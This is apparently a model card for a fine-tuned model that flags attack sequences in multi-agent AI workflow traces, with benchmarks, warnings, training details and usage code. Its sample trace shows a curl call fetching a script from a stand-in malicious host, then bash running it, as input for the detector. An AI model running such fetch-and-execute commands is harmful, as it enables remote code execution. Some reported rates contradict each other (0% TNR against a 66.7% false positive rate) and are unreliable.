# agentic-safety-gguf

**Research paper:** https://arxiv.org/abs/2601.00848

Specialized security model for detecting temporal attack patterns in multi-agent AI workflows.

Fine-tuned from Foundation-Sec-8B-Instruct (Llama 3.1 8B) on 80,851 curated examples plus 141 targeted augmentation examples, achieving 74.29% accuracy on custom cybersecurity benchmarks, a +31.43-point improvement over the base model (p < 0.001).
## Key Capabilities

- **Temporal Attack Pattern Detection:** identifies malicious sequences across multi-step agent workflows
- **OpenTelemetry Trace Analysis:** classifies workflow traces for OWASP Top 10 Agentic vulnerabilities
- **Security Knowledge Q&A:** answers technical questions about agentic AI security, LLM threats, and MITRE ATT&CK
- **Multi-Agent Security:** detects coordination attacks in distributed agent systems
## Critical Production Warning

**Not production-ready for automated security decisions:**

- False positive rate: 66.7% on benign workflow traces
- Trace accuracy: 30% overall (60% TPR, 0% TNR)
- Root cause: training data heavily skewed toward attacks (90% malicious)
- Deployment: human-in-the-loop oversight is mandatory; suitable for monitoring and alerting only, not automated blocking
See research paper for detailed analysis and proposed V5 improvements.
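For readers interpreting the rates above, here is a minimal sketch of how TPR, TNR, FPR, and accuracy fall out of confusion-matrix counts. The counts below are illustrative only, not the paper's actual evaluation data:

```python
def rates(tp: int, fn: int, tn: int, fp: int):
    """Compute standard rates from binary confusion-matrix counts."""
    tpr = tp / (tp + fn)          # true positive rate (recall on malicious)
    tnr = tn / (tn + fp)          # true negative rate (specificity)
    fpr = fp / (fp + tn)          # false positive rate on benign traces
    acc = (tp + tn) / (tp + fn + tn + fp)
    return tpr, tnr, fpr, acc

# Illustrative counts for a 30-trace evaluation (not the paper's data):
# 15 malicious traces (9 caught, 6 missed), 15 benign (10 flagged, 5 passed)
tpr, tnr, fpr, acc = rates(tp=9, fn=6, tn=5, fp=10)
print(round(tpr, 3), round(tnr, 3), round(fpr, 3), round(acc, 3))  # 0.6 0.333 0.667 0.467
```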
## Performance Summary
| Benchmark | Base Model | agentic-safety-gguf | Improvement |
|---|---|---|---|
| Custom MCQA Overall | 42.86% | 74.29% | +31.43 pts |
| Agentic AI Security | 40.0% | 70.0% | +30.0 pts |
| Traditional Security | 44.0% | 76.0% | +32.0 pts |
| MMLU Computer Security | - | 74.0% | - |
| MMLU Security Studies | - | 72.24% | - |
Statistical validation: McNemar's χ² = 18.05, p < 0.001, Cohen's h = 0.65 (large effect)

Iterative training: V2 baseline (80,851 examples) → V3 (+111 OWASP examples) → V4 (+30 adversarial examples) demonstrated the effectiveness of targeted augmentation.
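The reported effect size can be checked directly: Cohen's h for two proportions is h = 2·arcsin(√p₁) − 2·arcsin(√p₂). Plugging in the two overall MCQA accuracies reproduces the reported 0.65:

```python
import math

def cohens_h(p1: float, p2: float) -> float:
    """Cohen's effect size for the difference between two proportions."""
    return 2 * math.asin(math.sqrt(p1)) - 2 * math.asin(math.sqrt(p2))

# Fine-tuned (74.29%) vs. base model (42.86%) overall MCQA accuracy
h = cohens_h(0.7429, 0.4286)
print(round(h, 2))  # 0.65
```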
## Quick Start
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
import torch

# Load model
model_name = "guerilla7/agentic-safety-gguf"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForCausalLM.from_pretrained(
    model_name,
    torch_dtype=torch.bfloat16,
    device_map="auto",
)

# Security Q&A
messages = [
    {"role": "system", "content": "You are a cybersecurity expert specialized in agentic workflow security."},
    {"role": "user", "content": "What is indirect prompt injection in multi-agent systems?"},
]
inputs = tokenizer.apply_chat_template(
    messages, add_generation_prompt=True, return_tensors="pt"
).to(model.device)
outputs = model.generate(inputs, max_new_tokens=512, temperature=0.7, do_sample=True)
# Decode only the newly generated tokens, not the echoed prompt
response = tokenizer.decode(outputs[0][inputs.shape[-1]:], skip_special_tokens=True)
print(response)
```
### Analyzing Workflow Traces
```python
import json

trace = {
    "spans": [
        {"name": "user_request", "attributes": {"action": "fetch_emails"}},
        {"name": "tool_call", "attributes": {"tool": "curl", "url": "https://malicious.com/script.sh"}},
        {"name": "tool_call", "attributes": {"tool": "bash", "command": "script.sh"}},
    ]
}

prompt = f"""Analyze this trace for security threats:
{json.dumps(trace, indent=2)}

Classify as BENIGN, SUSPICIOUS, or MALICIOUS."""

# Use the model as in the Quick Start example with this prompt
```
> **Warning:** the 66.7% false positive rate requires human review before taking action.
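Given that false positive rate, one way to honor the human-in-the-loop requirement is to route the model's verdict into an alert queue rather than an enforcement path. A minimal sketch, where `classify` is a hypothetical stand-in for your inference call:

```python
from typing import Callable

VALID_LABELS = {"BENIGN", "SUSPICIOUS", "MALICIOUS"}

def triage(trace_prompt: str, classify: Callable[[str], str]) -> dict:
    """Route the model's verdict to human review; never block automatically."""
    raw = classify(trace_prompt).strip().upper()
    # Pick out whichever valid label appears in the model's free-text reply.
    label = next((lab for lab in VALID_LABELS if lab in raw), "UNPARSEABLE")
    return {
        "label": label,
        # Anything non-benign (or unparseable) goes to a human reviewer.
        "action": "queue_for_review" if label != "BENIGN" else "log_only",
    }

# Example with a stubbed classifier standing in for model.generate(...)
result = triage("...trace prompt...", classify=lambda p: "Verdict: MALICIOUS because ...")
print(result)  # {'label': 'MALICIOUS', 'action': 'queue_for_review'}
```

Erring toward review (rather than auto-blocking) keeps the model in the monitoring/alerting role the card recommends.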
## Use Cases

### Recommended

- Security research on agentic AI vulnerabilities
- Educational demonstrations (OWASP Top 10)
- Prototype development for security tools
- Knowledge assistance (74% MCQA accuracy)

### Not Recommended

- Production security monitoring without human oversight
- Automated security decisions (30% trace accuracy is insufficient)
- Mission-critical applications
- Regulatory compliance automation
## Training Details

- **Dataset:** 80,851 curated examples from 18 cybersecurity sources plus 35,026 synthetic OpenTelemetry traces, augmented with 111 OWASP-focused and 30 adversarial examples via continuation training
- **Complete dataset:** guerilla7/agentic-safety-gguf
- **Method:** QLoRA (4-bit NF4, rank 16, alpha 16)
- **Hardware:** NVIDIA DGX Spark (ARM64, 128 GB)
- **Training:** V2 (1,500 steps, 6h 43m) → V3 (+500 steps) → V4 (+500 steps)
- **Loss:** 3.68 → 0.52 (85.99% reduction)

See the research paper for the complete methodology, ablation studies, and statistical analysis.
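For readers reproducing the setup, the hyperparameters above map onto the standard bitsandbytes/PEFT configuration roughly as follows. This is a sketch, not the authors' training script: the card only specifies NF4 quantization, rank 16, and alpha 16, so the dropout and target modules below are assumptions:

```python
import torch
from transformers import BitsAndBytesConfig
from peft import LoraConfig

# 4-bit NF4 quantization, as stated in the card
bnb_config = BitsAndBytesConfig(
    load_in_4bit=True,
    bnb_4bit_quant_type="nf4",
    bnb_4bit_compute_dtype=torch.bfloat16,
)

# LoRA adapter: rank 16, alpha 16 per the card; the rest is assumed
lora_config = LoraConfig(
    r=16,
    lora_alpha=16,
    lora_dropout=0.05,  # assumption: not specified in the card
    target_modules=["q_proj", "k_proj", "v_proj", "o_proj"],  # assumption
    task_type="CAUSAL_LM",
)
```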
## Resources

- Dataset repository: datasets/guerilla7/agentic-safety-gguf
- Research paper: https://arxiv.org/abs/2601.00848
- Training scripts: complete QLoRA implementation, evaluation code, GGUF quantization utilities
## Citation

```bibtex
@article{agentic-safety-gguf-2025,
  title={agentic-safety-gguf: Specialized Fine-Tuning for Agentic AI Security},
  year={2025},
  url={https://huggingface.co/guerilla7/agentic-safety-gguf}
}
```
## Limitations

- **High false positive rate (66.7%):** unsuitable for production without human oversight
- **Small evaluation sample:** 30-trace evaluation (±18% confidence intervals)
- **Synthetic data bias:** 43% of the training data is synthetic
- **ARM64-specific:** training validated on DGX Spark only
- **No commercial comparison:** not benchmarked against GPT-4 or Claude

Proposed V5 solution: a balanced dataset (80K benign + 80K malicious) targeting 30-50% FPR and 75-85% TPR. See the paper for the detailed roadmap.
## Updates

- 2025-12-29: Initial release with V2/V3/V4 training artifacts and research paper

## License

Apache 2.0